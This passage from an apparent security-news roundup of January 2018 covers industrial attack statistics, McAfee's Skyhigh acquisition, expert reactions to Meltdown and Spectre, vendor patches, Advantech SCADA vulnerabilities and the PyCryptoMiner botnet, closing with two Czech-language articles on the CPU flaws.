Of the 962 industrial companies surveyed, 28% said they had faced a targeted attack in the last 12 months. This represents an 8 percentage point increase compared to the previous year.

“The fact that the most dangerous incident type has grown by more than a third strongly suggests that cybercriminal groups are paying much closer attention to the industrial sector,” Kaspersky said.

More than half of industrial organization surveyed by Kaspersky reported being hit by malware attacks in the last year.

Industrial%20sector%20attacks

A majority of industrial sector respondents claimed that the security incidents they experienced were complex, and nearly half admitted that there is insufficient insight into the threats they face.

Roughly one-third of companies reported that it had taken them several days to detect an incident, while 20% said it had taken them several weeks.

While 62% believe sophisticated security software is necessary to address potential threats, almost half of respondents also noted that staff has not followed IT security policies. The number of people who blamed staff in the industrial sector is 6% higher compared to other sectors that took part in Kaspersky’s survey.

“Cyberattacks on industrial control systems have become the indisputable number-one concern. The good news is that the majority of industrial market players know which threats are coming to the fore today and will be relevant in the near future,” explained Andrey Suvorov, Head of Critical Infrastructure Protection Business Development at Kaspersky.

“That’s why it’s crucially important to implement a complex security solution that’s specifically designed to protect automated industrial environments, is highly flexible and configured in accordance with the technological processes of each organisation.”


Inside McAfee's Acquisition of Skyhigh Networks
5.1.2018 securityweek IT
McAfee Completes Acquisition of Skyhigh Networks

On Jan. 3, McAfee completed the acquisition of Skyhigh Networks that was announced in November 2017. McAfee itself was spun out of Intel in April 2017 with the express purpose of becoming one of the world's largest pure play cybersecurity firms. The purchase of Skyhigh, a cloud access security broker (CASB), now allows McAfee to offer an integrated security solution from endpoint across networks and into the cloud.

"Today's news marks a new milestone for the future of our company in cloud," said Chris Young, McAfee's CEO. "With two industry leaders meeting under one company, we will make cybersecurity an enabler to the transformative power of our digital age. We are focused on securing customers from their devices to the cloud."

SecurityWeek talked to McAfee SVP and CTO Steve Grobman to understand the mechanics and purpose of this new, expanded, McAfee. "McAfee's strategy," he said, "is all about security from the device to the cloud, and supporting organizational defense with all the information that comes from both of those places. McAfee currently has a very strong set of technologies on the endpoint, on the devices -- but what the Skyhigh acquisition does is provide a very powerful control point in the cloud for a wide range of cloud security use cases."

McAfee LogoHe believes there are three exciting aspects to this purchase: being able to offer greater cloud visibility and control under the McAfee umbrella; the improved threat detection that will come from seeing both cloud and on-premise threats in context; and the continuing growth potential of CASBs in their own right.

The Skyhigh solution offers three primary aspects to cloud security: visibility into the cloud; control over interaction with the cloud; and greater awareness of and solutions to the threats inherent in moving into public cloud. "At the highest level," he said, "a big part of the cloud problem is just awareness of what Shadow IT services an organization is using. More often than not, people are not using shadow IT because they are malicious, but rather because it they have found a more efficient way for them to get their job done.

"Skyhigh," he continued, "can identify the use of Shadow IT so that an organization can determine whether it's an approved and sanctioned use of cloud capabilities, and take appropriate action." This is useful. Employees can sometimes find a better solution to their work requirements than is currently available from the IT department. Simply banning Shadow IT probably would not work, but would certainly have a negative effect on employee initiative and productivity. Knowing what is being used allows the security team to analyze the risk and determine whether and to what extent a newly used cloud application should be allowed within the enterprise.

The second aspect, he continued, "is about controlling and managing access, content and methodologies for cloud services. That's either through proxies or through native cloud APIs that provide better visibility into the way that users are accessing these services." He gave the example of moving from on-prem Exchange to cloud Office 365, where the organization will need to ensure that sensitive information isn't flowing to places it shouldn't.

"The organization might want to have different policies for what users can do when they access the cloud based on different access scenarios. For example, if employees are using a managed corporate laptop, they might have unrestricted access to O365 where they can download documents with the full versions of Word or Excel. But if they are accessing their account through their personal phone there might be a policy setting that would restrict them to only using the web interface; or requiring that if they download a document, it is wrapped in an enterprise or digital rights management control. Being able to control how the cloud is used makes it possible to minimize risk."

The third element is in identifying and solving the new risks that come with moving to the cloud. "When organizations move to the cloud, they need to be aware of all sorts of new risks that a CASB solution is able to monitor, detect and alert on," he said. He gave AWS S3 misconfigurations as an example. "There have been numerous data breaches recently involving the misconfiguration of access controls in public cloud storage. Users have inadvertently given world read access to an Amazon S3 bucket, giving anyone access to what should be protected data." Examples include the exposure of tens of thousands of potentially sensitive government files disclosed in June 2017; the personal details of 198 million American voters also disclosed in June 2017; and millions of Dow Jones customer details exposed in July 2017.

What really excites Grobman about the Skyhigh acquisition is the ability to combine and integrate visibility into cloud threats with McAfee's existing visibility into on-premise threats.

"A large part of threat detection today is not in identifying a threat from just one event, but understanding threats from multiple events chained together," Grobman said. "In order to do this effectively, you need to have visibility into events from many different sources, including both the cloud and on-prem corporate devices. This is one reason why the Skyhigh acquisition makes a lot of sense for McAfee -- it is the aggregation of looking at the information coming from both the cloud computing element of the organization as well as traditional computing resources. When you put these together you can identify a lot of threats that would be difficult to detect individually."

Now the acquisition is complete, Grobman explained that Skyhigh will largely exist as its own division within McAfee. "Rajiv Gupta, the founder and CEO of Skyhigh, will join McAfee CEO Chris Young's staff and drive the product line as its own business unit. There are a few exceptions related to back office functions, like finance and HR," he added, "but for the most part, the initial approach is for Skyhigh to be its own business unit."

The definitive roadmap for things like branding are still being investigated. For the moment, the official McAfee announcement describes Skyhigh as "now part of the new cloud security business unit, led by Rajiv Gupta, former Skyhigh Networks chief executive officer."

"What we're concentrating on," said Grobman, "is really building on the synergies that Skyhigh will bring to our environment; taking McAfee's world class protection technology and integrating that into Skyhigh -- being able to look at event data from both cloud sources and traditional computing and have those work together in order to give our customers a better ability to detect threats within their infrastructure. So although the Skyhigh business will be a separate business unit within McAfee, there will be lots of work to maximize the value of the solution the system can bring to both existing and new customers."

And that, of course, is another offering from the acquisition. The CASB market is still a rapidly growing and emerging area. "There are still many customers that have yet to deploy a CASB solution," said Grobman. "We are very much looking forward to the opportunity to present this technology solution -- especially in the context of McAfee's other technology -- to organizations that are not yet McAfee customers."


Industry Reactions to Meltdown, Spectre Attacks: Feedback Friday
5.1.2018 securityweek
Attack
Researchers disclosed this week the details of two new attack methods allowing malicious actors to gain access to sensitive information stored in a device’s memory by exploiting security holes in Intel, AMD and ARM processors.

The attacks, known as Spectre and Meltdown, have already been addressed by several vendors, including Microsoft, Apple and Google, and Intel and others are also working on rolling out patches.

Billions of PCs, mobile devices and cloud instances are vulnerable to attacks leveraging the Spectre and Meltdown vulnerabilities, and some fear we will soon witness remote exploitation attempts.

Experts comment on the Meltdown and Spectre vulnerabilities

Industry professionals have commented on various aspects of Meltdown and Spectre, including their impact, what users and organizations need to do, and the lessons that can be learned.

And the feedback begins…

Sam Curry, Chief Security Officer, Cybereason:

“The recent revelation of a major chip design security flaw is quite technical and gets to the underlying architecture and interface of physical memory and virtual memory, which is a big part of all practical, modern computing. It’s important to note that no one is immune by default to this chip design flaw and that it may impact a wider set of chips and manufacturers over time. In trying to find ways of improving overall security in memory management, researchers have uncovered a very long running set of flaws that could mean the ability to exploit a lot of systems very deeply.

This is so fundamental that it’s likely they knew about the flaw, so it’s going to be important to watch how they handle the situation and how the narrative and history unfold. The chip vendors are playing this calmly, but this is likely the calm before the storm. It's too early to point fingers yet, but eyes are on the entire chip industry now. Also in spite of the early attention on Intel, this class of threats effects other chip sets. Now is the time for everyone in the chip game to take care of their own business. No excuses.”

Michael Daly, CTO, Cybersecurity & Special Missions, Raytheon:

“The Intel vulnerability reinforces the need for everyone to stay on top of the latest patches. We learned that hard lesson with the Wannacry attack that quickly spread to 150 countries.

In this case, the most immediate and significant risk exists in the cloud services provider environments and in private data centers. The threat seems to be the grabbing of passwords/hash-values and encryption keys from memory and then using these to install additional malware.

Until these systems can all be patched, it will be even more important to watch for unauthorized processes (applications) and other evidence of tampering, such as increased processor usage and file drops. When the patches are issued, their deployment should be prioritized because criminals and nation-state adversaries apparently have had a couple of months head start.”

Ryan Kalember, SVP, Cybersecurity Strategy, Proofpoint:

“Like most organizations, chip manufacturers have long prioritized speed over security—and that has led to a tremendous amount of sensitive data placed at risk of unauthorized access via Meltdown and Spectre. While the vast majority of computing devices are impacted by these flaws, the sky is not falling. Both vulnerabilities require an attacker to be able to run their code on the device they are attacking. The typical consumer is still vastly more likely to be targeted by something like a phishing email than a targeted attack exploiting Meltdown or Spectre. However, these vulnerabilities break down some of the most fundamental barriers computers use to keep data safe, so cloud providers need to act quickly to ensure that unauthorized access, which would be very difficult to detect, does not occur.

If there is some good news, it’s fortunate that these vulnerabilities were discovered and responsibly disclosed by respected researchers as opposed to being exploited in a large scale, potentially-damaging global attack.”

Bryce Boland, Asia Pacific Chief Technology Officer, FireEye:

“Vulnerabilities like this are extremely problematic because they permeate so much of the technology around us that we all rely upon. Resolving this issue will take time and incur costs. In many cases, this cost includes security risks, rectification effort and even computing performance.

These vulnerabilities can have big implications. Many services can be exposed and affected. Hardware vendors will address the underlying design issue, though vulnerable systems will likely remain in operation for decades. In the meantime, software vendors are releasing patches to prevent attackers from exploiting these vulnerabilities. This will also impact system performance which may have a cumulative effect in data centers for anyone using cloud services and the internet.

Large organizations will need to make a risk management decision as to how quickly they update their systems, as this can be disruptive and costly.

We are yet to understand the full impact of this development, and not all details are available. At this stage, exploitable code is not publicly available. Nation state hackers typically use these types of vulnerabilities to develop new attack tools, and that's likely in this case.”

Christian Vezina, Chief Information Security Officer, VASCO Data Security:

“What I find interesting is that with the ever increasing amount of software code of out there, security researchers are still discovering 20+ years old vulnerabilities. Unfortunately the processor level vulnerabilities that have been published recently seem to indicate a trend: Everyone drop what you are doing and start patching your systems [again].”

Ben Carr, Vice President of Strategy, Cyberbit:

“Vulnerabilities like Meltdown only highlight the breadth of the potential issue we face no matter the investment. Meltdown potentially affects Intel processors going back to 1995. While many are rushing to find a fix after the disclosure, one must admit that this is why nation state actors don’t really have to try that hard to find a way in. At its core, it just isn’t that difficult.

In the cybersecurity industry, we must realize that we have maxed out on our ability to lock down systems and networks. It has become critical that we look to ways not only to prevent but to defend.”

Michael Lines, VP of strategy, risk and compliance, Optiv:

“The Meltdown and Spectre security flaws are affecting billions of devices, but the fundamental challenges that organizations face remain the same as every other major vulnerability that has been announced. Fixing these security flaws is going to be a long-term issue to resolve because, one, patches are needed across a vast array of operating systems, and two, patches for Spectre are still to be developed and released.

These widespread vulnerabilities underscore the importance of having ongoing risk assessment processes in place, as well as well-oiled TVM processes – both as part of a robust information security program. Risk assessment should cover both awareness and management of the issue at the board and C-suite level. These flaws are going to bring a lot of ‘doom and gloom,’ but organizations’ ability to react in an efficient and predictable way is what is most critical. Don’t panic, prepare a rational plan based on patch availability and system sensitivity, execute your plan, and monitor progress.”

Prof. Yehuda Lindell, chief scientist and co-founder, Dyadic:

“The important take-away from these attacks is very simple - computation leaks secrets! There has been a huge body of work showing that secret cryptographic keys and private information can be stolen by running software on the same machine and utilizing the properties of modern complex processors that don’t provide true separation between processes. In the past it has been shown how the machine's cache and even clock can be used by one process to steal secrets from another. Meltdown and Spectre go a step further by utilizing the way that modern processors achieve speedups through something called “speculative execution”.

As a result, if you are computing on private information or carrying out cryptographic operations on a machine, and an attacker can run code on the same machine, then you are not safe. This includes the case that an attacker breaches your network, but is primarily of relevance in cloud environments where by definition different customers run their applications on the same machine.”

Jeff Tang, Senior Security Researcher, Cylance:

“The biggest impact is for companies relying on shared computing resources in the cloud - such as virtual private servers, virtual machines, and containers - which place them at higher risk of an attacker employing these new techniques to extract secrets (passwords, encryption keys, and other sensitive data). Administrators should check with their hosting provider to determine the appropriate steps to deploy mitigations which may include applying software updates and rebooting the virtual machine.

Administrators should prioritize patch testing and validation of the newly released Microsoft security update and deploy them to shared workstations and hypervisor based systems which are at higher risk of being targeted by attackers hoping to maximize their impact.”

Joseph Carson, Chief Security Scientist, Thycotic:

“The latest Intel, ARM and AMD chip security flaw is a major issue for multiple reasons, the security risk has the potential for simple code running in a web browser. This could allow for a cybercriminal to access sensitive data in protected memory which could include passwords, login keys or sensitive data that is typically protected. The patch of such a flaw is a major challenge as a firmware update typically requires a reboot so for servers running critical systems, this results in unplanned downtime. With the fix having a potential performance impact of up to 30%, this means critical systems already running at full power could require costly upgrades to ensure operational stability.

With these cyber risks, it means that most companies will approach patching systems with extreme caution as many companies still prioritise business operations over security issues. The impact for many companies not having the systems operational is sometimes greater than the risk of a cyberattack but cyberattacks do not come cheap either as seen with cyberattacks like WannaCry and NotPetya in 2017 costing some companies up to 300 million USD. The systems at higher risk are those that are internet connected, meaning they are easily accessible by cybercriminals and those systems used by employees, who regularly use them for browsing the internet, so these systems should be the priority for any organisation that takes cybersecurity seriously.”


Ubuntu Preps Patches for Meltdown, Spectre CPU Flaws
5.1.2018 securityweek
Vulnerebility
Ubuntu security updates planned for January 9 will patch the recently disclosed Meltdown and Spectre CPU vulnerabilties, Canonical has announced.

Impacting billions of devices around the world, Meltdown and Spectre are two new side-channel attacks targeting CPUs from Intel, AMD and ARM. Residing in the CPU architecture, the flaws impact Windows, MacOS, Linux, and many other operating systems.

The attacks abuse three different flaws and can be leveraged to bypass memory isolation and access sensitive data such as passwords, photos, documents, and emails.

Experts are warning of the risk of remote exploitation of Spectre vulnerabilities in targeted or mass attacks and tech companies such as Microsoft, Google, Apple, and others have already revealed plans to address the issues in their products.

On Thursday, Intel announced patches for its CPUs, saying it would address the bugs in 90% of the CPUs produced over the past five years.

Intel is said to have been aware of the vulnerabilities since April 2017, and other companies were informed on the matter a while ago as well, including Canonical, which has been working on fixes for the past couple of months.

According to the company, “essentially every operating system, hardware, and cloud vendor in the world” agreed to a coordinated release date of January 9, 2018, but the news on Meltdown and Spectre broke earlier. However, patches for Ubuntu won’t be available until the planned release date.

“By design, operating system updates would be available at the same time as the public disclosure of the security vulnerability. While it happens rarely, this an industry standard best practice, which has broken down in this case,” Canonical explains.

Ubuntu 64-bit x86 (aka, amd64) should receive updated kernels by Jan 9, or sooner if possible. The updates will be released for Ubuntu 17.10 (Artful) — Linux 4.13 HWE; Ubuntu 16.04 LTS (Xenial) — Linux 4.4 (and 4.4 HWE); Ubuntu 14.04 LTS (Trusty) — Linux 3.13; and Ubuntu 12.04 ESM (Precise) — Linux 3.2 (an Ubuntu Advantage license is required for the 12.04 ESM kernel update).

In April, Ubuntu 18.04 LTS (Bionic) will ship with a 4.15 kernel, which includes the KPTI patchset as integrated upstream, the company says.

“Ubuntu optimized kernels for the Amazon, Google, and Microsoft public clouds are also covered by these updates, as well as the rest of Canonical’s Certified Public Clouds including Oracle, OVH, Rackspace, IBM Cloud, Joyent, and Dimension Data,” Canonical explains.

The company also warns that a reboot will be required to activate the update, as the kernel fixes are not Livepatch-able. The update includes “hundreds of independent patches, touching hundreds of files and thousands of lines of code,” and the complexity of the patchset is not compatible with the Linux kernel Livepatch mechanism.


Several Vulnerabilities Patched in Advantech WebAccess
5.1.2018 securityweek
Vulnerebility
Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address several vulnerabilities, including ones rated high severity.

Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. According to ICS-CERT, the product is used in the United States, Europe and East Asia in sectors such as critical manufacturing, energy, and water and wastewater.

Researchers have once again found several vulnerabilities in this HMI/SCADA product. One of the most serious, based on its CVSS score of 8.2, is CVE-2017-16724, which has been described as a stack-based buffer overflow. These types of security holes typically allow an attacker to crash the application and possibly even execute arbitrary code.

The identifier CVE-2017-16728 has been assigned to several untrusted pointer dereference vulnerabilities that can be exploited to cause the application to crash.

Experts also identified a path traversal flaw that can be exploited to access files on the targeted device (CVE-2017-16720), and a SQL injection vulnerability caused by the lack of proper sanitization of user input (CVE-2017-16716).

The least serious weakness, classified as medium severity, allows an attacker to crash the application using specially crafted inputs.

The vulnerabilities have been patched by Advantech with the release of WebAccess 8.3. The vendor says all prior versions are affected.

A report published last year by Trend Micro’s Zero Day Initiative (ZDI) showed that it had taken Advantech, on average, 131 days to patch vulnerabilities, which was significantly better compared to many other major ICS vendors. ZDI published more than 50 advisories for Advantech vulnerabilities in 2017, which was roughly half the number published in the previous year.

Several of the flaws were reported through ZDI by researchers Steven Seeley, Zhou Yu and Andrea Micalizzi. ZDI has prepared advisories for the vulnerabilities, but it has yet to make them public. The list of experts credited by ICS-CERT for finding the flaws also includes Michael Deplante.

Seeley was also credited for finding two remote code execution vulnerabilities in Advantech WebAccess in November.


PyCryptoMiner botnet, a new Crypto-Miner Botnet spreads over SSH
5.1.2017 securityaffairs BotNet

Security experts at F5 discovered a new Linux Monero crypto-miner botnet dubbed PyCryptoMiner spreading over the SSH protocol.
F5 researchers discovered a new Linux crypto-miner botnet dubbed PyCryptoMiner spreading over the SSH protocol. The Monero miner botnet is based on the Python scripting language, it leverages Pastebin as command and control server infrastructure when the original C&C isn’t available.

If all C&C servers of the botnet are not accessible, all newly infected bots are idle, polling for the botmaster’s Pastebin page.

The experts believe the botnet it under development, operators have recently added scanner functionality hunting for vulnerable JBoss servers (exploiting CVE-2017-12149).

It has been estimated that the PyCryptoMiner botnet has generated the equivalent of approximately $46,000 as of late December.

The experts believe the PyCryptoMiner botnet is more evasive due to its scripting language-based nature, it is hard to detect because it is executed by a legitimate binary.

The malware spreads by attempting to guess the SSH login credentials of target Linux systems. Once SSH credentials are guessed, the bot deploys a simple base64-encoded Python script designed to connect to the C&C server to download and execute additional Python code.

The second-stage code is the controller that registers a cron job on the infected machine to gain persistence.

The original script checks whether the machine has been already infected, it also collects information on the infected device including:

Host/DNS name
OS name and its architecture
Number of CPUs
CPU usage
The bot sends a report with the collected information to the C&C that in turn send it task details. The “task” includes:

“cmd” — arbitrary command to be executed as a separate process
“client_version” — if the version number received from the server is different from the current bot version, it will terminate the bot and wait for the cron to run the spearhead script again to deploy an updated version (current value is “4”)
“task_hash” — task identifier so the C&C can synchronize botnet results, because each command has a different execution time
“conn_cycler” — time interval to poll the C&C, which is controlled by the bot master, probably to balance the loads on its C&C infrastructure as the botnet grows (default value 15 seconds)
The PyCryptoMiner botnet uses two pool addresses that show approximately 94 and 64 Monero, with a value of around $60,000. However, it is not possible to know overall profits of the botnet.

The analysis of the Pastebin page used are alternative C&C revealed the botnet might have been active since August 2017, and that the content had been viewed 177,987 times at the time of the investigation. It is not possible to determine the overall size of the botnet because each bot could periodically visit the page when the C&C server is down.

The botmaster used the moniker “WHATHAPPEN” which is associated with more than 36,000 domains and 235 email addresses. The registrant has been involved in scams, gambling, and adult services since 2012.

Below F5’s key findings on the PyCryptoMiner botnet:

Is based on the Python scripting language making it hard to detect
Leverages Pastebin.com (under the username “WHATHAPPEN”) to receive new command and control server (C&C) assignments if the original server becomes unreachable
The registrant is associated with more than 36,000 domains, some of which have been known for scams, gambling, and adult services since 2012
Is mining Monero, a highly anonymous crypto-currency favored by cyber-criminals. As of late December 2017, this botnet has made approximately US $46,000 mining Monero
New scanner functionality hunting for vulnerable JBoss servers was introduced mid-December exploiting CVE-2017-12149
F5 also published IoCs for the botnet.


[Guide] How to Protect Your Devices Against Meltdown and Spectre Attacks
5.1.2017 thehackernews 
Attack


Recently uncovered two huge processor vulnerabilities called Meltdown and Spectre have taken the whole world by storm, while vendors are rushing out to patch the vulnerabilities in its products.
The issues apply to all modern processors and affect nearly all operating systems (Windows, Linux, Android, iOS, macOS, FreeBSD, and more), smartphones and other computing devices made in the past 20 years.
What are Spectre and Meltdown?
We have explained both, Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753, CVE-2017-5715), exploitation techniques in our previous article.
In short, Spectre and Meltdown are the names of security vulnerabilities found in many processors from Intel, ARM and AMD that could allow attackers to steal your passwords, encryption keys and other private information.
Both attacks abuse 'speculative execution' to access privileged memory—including those allocated for the kernel—from a low privileged user process like a malicious app running on a device, allowing attackers to steal passwords, login keys, and other valuable information.
Protect Against Meltdown and Spectre CPU Flaws
Some, including US-CERT, have suggested the only true patch for these issues is for chips to be replaced, but this solution seems to be impractical for the general user and most companies.
Vendors have made significant progress in rolling out fixes and firmware updates. While the Meltdown flaw has already been patched by most companies like Microsoft, Apple and Google, Spectre is not easy to patch and will haunt people for quite some time.
Here's the list of available patches from major tech manufacturers:
Windows OS (7/8/10) and Microsoft Edge/IE
Microsoft has already released an out-of-band security update (KB4056892) for Windows 10 to address the Meltdown issue and will be releasing patches for Windows 7 and Windows 8 on January 9th.
But if you are running a third-party antivirus software then it is possible your system won’t install patches automatically. So, if you are having trouble installing the automatic security update, turn off your antivirus and use Windows Defender or Microsoft Security Essentials.
"The compatibility issue is caused when antivirus applications make unsupported calls into Windows kernel memory," Microsoft noted in a blog post. "These calls may cause stop errors (also known as blue screen errors) that make the device unable to boot."
Apple macOS, iOS, tvOS, and Safari Browser
Apple noted in its advisory, "All Mac systems and iOS devices are affected, but there are no known exploits impacting customers at this time."
To help defend against the Meltdown attacks, Apple has already released mitigations in iOS 11.2, macOS 10.13.2, and tvOS 11.2, has planned to release mitigations in Safari to help defend against Spectre in the coming days.
Android OS
Android users running the most recent version of the mobile operating system released on January 5 as part of the Android January security patch update are protected, according to Google.
So, if you own a Google-branded phone, like Nexus or Pixel, your phone will either automatically download the update, or you'll simply need to install it. However, other Android users have to wait for their device manufacturers to release a compatible security update.
The tech giant also noted that it's unaware of any successful exploitation of either Meltdown or Spectre on ARM-based Android devices.
Firefox Web Browser
Mozilla has released Firefox version 57.0.4 which includes mitigations for both Meltdown and Spectre timing attacks. So users are advised to update their installations as soon as possible.
"Since this new class of attacks involves measuring precise time intervals, as a partial, short-term mitigation we are disabling or reducing the precision of several time sources in Firefox," Mozilla software engineer Luke Wagner wrote in a blog post.
Google Chrome Web Browser
Google has scheduled the patches for Meltdown and Spectre exploits on January 23 with the release of Chrome 64, which will include mitigations to protect your desktop and smartphone from web-based attacks.
In the meantime, users can enable an experimental feature called "Site Isolation" that can offer some protection against the web-based exploits but might also cause performance problems.
"Site Isolation makes it harder for untrusted websites to access or steal information from your accounts on other websites. Websites typically cannot access each other's data inside the browser, thanks to code that enforces the Same Origin Policy." Google says.
Here's how to turn on Site Isolation:
Copy chrome://flags/#enable-site-per-process and paste it into the URL field at the top of your Chrome web browser, and then hit the Enter key.
Look for Strict Site Isolation, then click the box labelled Enable.
Once done, hit Relaunch Now to relaunch your Chrome browser.
Linux Distributions
The Linux kernel developers have also released patches for the Linux kernel with releases including versions 4.14.11, 4.9.74, 4.4.109, 3.16.52, 3.18.91 and 3.2.97, which can be downloaded from Kernel.org.
VMware and Citrix
A global leader in cloud computing and virtualisation, VMware, has also released a list of its products affected by the two attacks and security updates for its ESXi, Workstation and Fusion products to patch against Meltdown attacks.
On the other hand, another popular cloud computing and virtualisation vendor Citrix did not release any security patches to address the issue. Instead, the company guided its customers and recommended them to check for any update on relevant third-party software.


Chyba procesorů se týká i nás, přiznal Apple. Zpomalí se také iPhony a iPady

5.1.2018 Novinky/Bezpečnost Apple
Není žádným tajemstvím, že počítače společnosti Apple využívají procesory společnosti Intel. Také jich se tedy týká nebezpečná chyba, která si žádá záplatu zpomalující celkový výkon. Společnost Apple však nyní přiznala, že problémy se týkají také iPhonů a iPadů.
„Bezpečnostní experti nedávno odhalili problémy týkající se procesorů. Ty se týkají – stejně jako v případě konkurence – všech našich moderních zařízení. Chybou jsou postiženy přístroje s operačním systémem macOS a iOS,“ stojí v prohlášení amerického počítačového gigantu.

To jinými slovy znamená, že ohroženi jsou uživatelé stolních počítačů, notebooků, tabletů i chytrých telefonů s logem nakousnutého jablka.

Zástupci Applu však zároveň potvrdili, že v rámci aktualizací byly chyby u celé řady zařízení opraveny. „Záplaty jsou obsaženy v systémech iOS 11.2, macOS 10.13.2 a tvOS 11.2, které byly vydány v uplynulých dnech,“ stojí dále v prohlášení.

Jak se instalace aktualizace promítne do celkového výkonu jednotlivých zařízení, není v tuto chvíli jasné. Lze nicméně předpokládat, že scénář bude stejný jako v případě jiných počítačů konkurenčních výrobců, kteří již záplaty otestovali.

Antiviry nepomohou
Při pohledu na technickou stránku věci je chyba opravdu kritická. Kvůli bezpečnostní trhlině se může dostat škodlivý kód do adresního prostoru, který byl vyhrazen pouze pro jádro systému. Řeč je tedy o prostoru, ke kterému neměl uživatel jinak přístup.

Zjednodušeně řečeno tak kvůli chybě mohou počítačoví piráti propašovat virus přímo do procesoru, aniž by se před ním mohl uživatel jakkoliv chránit. S adresním prostorem totiž nemohou pracovat například ani antivirové programy.

V současnosti jsou uživatelský prostor i ten pro jádro systému v procesoru mapovány společně, oprava chyby však vyžaduje jejich oddělení. A to je podle serveru The Register ten největší problém, protože po implementování záplaty dochází k citelnému zpomalení celého systému.

Vzhledem k tomu, že procesory společnosti Intel využívá více než 80 % počítačových systémů na světě, jde skutečně o problém obrovských rozměrů. Všem uživatelům – domácím i firemním – se kvůli tomu totiž sníží výkon jejich sestav. 

Společnost Intel zatím drží všechny informace o chybě pod přísným embargem. Dokud nebudou záplaty nainstalované na všech počítačích, pomohlo by zveřejnění všech detailů hackerům v plánování útoků, aby mohli chybu skutečně zneužít v praxi.

Výkon nižší až o polovinu
Podle serveru The Register se nicméně problémy týkají procesorů Intel Core šesté, sedmé a osmé generace. Dále pak trhlina postihuje čipy Xeon v5, v6, Xeon-W a také procesory Pentium a Atom z nižších řad Apollo Lake.

Nejrůznější testy procesorů od Intelu – a toho, jak se chovají před a po instalaci bezpečnostní aktualizace – doslova zaplavily internet. Prakticky všechny se shodují v tom, že úbytek výkonu není plošný, ale projevuje se jen při určitých pracích na počítačích.

Například při práci s videem a různými šifrovacími programy zaznamenal server Computerbase pokles výkonu pouze v řádu jednotek procent, což běžný uživatel nemá v praxi příliš šanci postřehnout.

Například při práci s databázemi však je již propad výrazně citelnější – zpravidla testy pojednávají o propadu okolo 20 %. Serveru Grsecurity však v některých testech vyšly propady výkonu pod operačním systémem Linux až o 51 %. 

Sluší se připomenout, že chyba objevená v samotném jádře procesorů se týká prakticky všech desktopových platforem, tedy vedle zmiňovaného Linuxu také Windows a macOS.

AMD dává od kauzy ruce pryč
Zpráva serveru Grsecurity je zajímavá také tím, že podle ní se chyba týká i konkurenčních procesorů od AMD. A propady výkonu jsou po úpravách operačního systému stejně výrazné jako v případě Intelu.

Softwarový inženýr AMD Tom Lendecky však opakovaně prohlásil, že čipy tohoto podniku využívají zcela jinou architekturu než Intel, díky čemuž se jich aktuální problémy vůbec netýkají. Procesory totiž pracují jinak s pamětí a jádrem, a nemohou být tedy útočníky zneužity.

Lendecky však připustil, že AMD také vydalo nedávno bezpečnostní aktualizaci pro procesory. Ta se však k problémům Intelu nevztahuje.

Podobná chyba nicméně byla objevena i u čipů platformy ARM, které využívá většina mobilních telefonů. Společnost ARM oznámila, že již poskytla nástroje k odstranění bezpečnostních nedostatků.


Intel: Bezpečnostní bug se týká procesorů všech výrobců. AMD a ARM: Nás ani ne…
5.1.2018 Novinky/Bezpečnost CDR.cz
Hardware
Společně s vyjádřením výrobců k bezpečností slabině se začaly objevovat různé spekulace, kterých produktů se problém týká a kterých ne. Přehlednosti situace nepřispěly některá vágní vyjádření výrobců…

Zmatek trochu souvisí i s tím, že při popisech problémů používá každý výrobce trochu odlišnou terminologii a navíc i fakt, že diskutované slabiny jsou ve skutečnosti tři a nikoli jedna. Když poté jeden z výrobců prohlásí „tento problém se nás netýká“ a jiný „tento problém se týká všech“, může ve skutečnosti každý hovořit o něčem trochu jiném a mít tedy svůj kus pravdy, byť by se mohlo zdát, že se vyjádření různých stran vzájemně vylučují.

Úvodem nebude na škodu, pokud se velmi stručně podíváme, kde se vzala nejzásadnější část problému. Moderní procesory, aby byly rychlé, používají tzv. spekulativní provádění instrukcí. Odhadují, co po nich bude v následujících taktech žádáno a to provedou s předstihem. Pokud se ukáže, že byl odhad správný, výsledek se použije (nebo ve výpočtu pokračuje) a úloha je hotová dříve = procesor je výkonnější. Pokud je odhad chybný, výsledek se zahodí.


To se samo o sobě nezdá být nějak zneužitelné, ale lze na tom dále stavět. Pokud je totiž uživatelem vyžádáno provedení kódu, ke kterému je vyžadována vyšší úroveň oprávnění, pak je při provedení první instrukce, u které je zjištěn přístup k datům s vyšší úrovní autorizace, kód zablokován a zahozen. Jenže na úrovni spekulativního provádění mohl kód běžet dál, provést ještě další instrukci (či instrukce) a pozůstatky po těchto úkonech zůstávají ležet v cache procesoru, dokud nejsou přepsány. Protože cache nižší úrovně nebo operační paměť funguje pomaleji než cache vyšší úrovně, existuje určitý čas k těmto datům, ke kterým neměl mít uživatel přístup, přistupovat a případně si je zkopírovat a dál je využít.

Stručně řečeno, obecné využití této myšlenky je označováno jako Spectre (po onom datovém reziduu v cache) a zcela konkrétní způsob využití, který můžeme chápat jako konkrétní prvek množiny Spectre, jehož možnost využití (respektive zneužití) byla prokázána a v praxi vyzkoušena, je označován jako Meltdown.

Protože spekulativní provádění instrukcí podporují všechny moderní procesory, je otázka Spectre relevantní ve vztahu ke všem moderním procesorům. Konkrétní bezpečností slabina v podobě Meltdown ovšem byla prokázána pouze u procesorů Intel.

Proto Intel může oprávněně tvrdit, že „Podle aktuálních analýz je mnoho typů výpočetních zařízeních s procesory mnoha různých výrobců […] citlivých k těmto způsobům zneužití.“ a zároveň AMD může oprávněně prohlásit: „Nulová zranitelnost procesorů AMD z důvodu odlišné architektury procesorů AMD.“

Vždy je třeba důsledně vyhodnotit kontext. AMD (podle rozdělení zavedeného Googlem) vysvětluje, jak to je s jednotlivými typy bezpečnostních slabin, které odhalil a dokumentuje Google v rámci svého projektu Zero, během něhož došlo k jejich odhalení.

Bounds Check Bypass - (Vy)řešeno aktualizacemi softwaru a operačních systémů. Výkonnostní dopad těchto řešení je zanedbatelný. [Tento bod, který lze chápat spíše jako slabinu v softwaru než jako slabinu hardwarů, mohl být využit (zneužit) na veškerém moderním hardwaru (AMD, ARM, Intel), ale byl již vyřešen a nemá citelný dopad na výkon.]
Branch Target Injection - Odlišnost architektury AMD znamená téměř nulové riziko zneužitelnosti tohoto postupu. Doposud se nepodařilo demonstrovat, že by varianta 2 byla využitelná (zneužitelná) na procesorech AMD. [Bod z množiny Spectre.]
Rogue Data Cache Load - Nulová zneužitelnost na hardwaru AMD z důvodu odlišné architektury. [Slabina Meltdown, která se týká Intelu.]
